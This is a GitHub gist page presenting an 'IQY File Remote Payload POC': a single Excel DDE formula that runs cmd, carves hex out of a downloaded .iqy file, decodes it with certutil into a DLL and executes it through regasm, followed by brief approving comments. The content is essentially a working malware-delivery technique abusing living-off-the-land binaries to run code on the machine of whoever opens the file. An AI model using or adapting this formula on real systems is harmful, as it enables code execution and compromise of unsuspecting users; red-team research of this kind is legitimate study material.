Last active
September 7, 2024 05:12
-
-
Save Mr-Un1k0d3r/abdcf16ebcef5842c7f79ee6686271e7 to your computer and use it in GitHub Desktop.
IQY File Remote Payload POC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1' |
Yeah keep in mind that the certutil is not mandatory same with the regasm. This is just a POC :)
;) Just saw it and thought it was cool!
…On Mon, Jul 15, 2019 at 11:58 AM Mr.Un1k0d3r ***@***.***> wrote:
Yeah keep in mind that the certutil is not mandatory same with the regasm.
This is just a POC :)
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<https://gist.github.com/abdcf16ebcef5842c7f79ee6686271e7?email_source=notifications&email_token=AA3N7UQCVUNFLURPYCVNPHTP7PYX5A5CNFSM4IDSYY72YY3PNVWWK3TUL52HS4DFVNDWS43UINXW23LFNZ2KUY3PNVWWK3TUL5UWJTQAFVJQ4#gistcomment-2970382>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/AA3N7UTYR6MAJ7JIIQVFX5LP7PYX5ANCNFSM4IDSYY7Q>
.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
IOCs:
Neat work.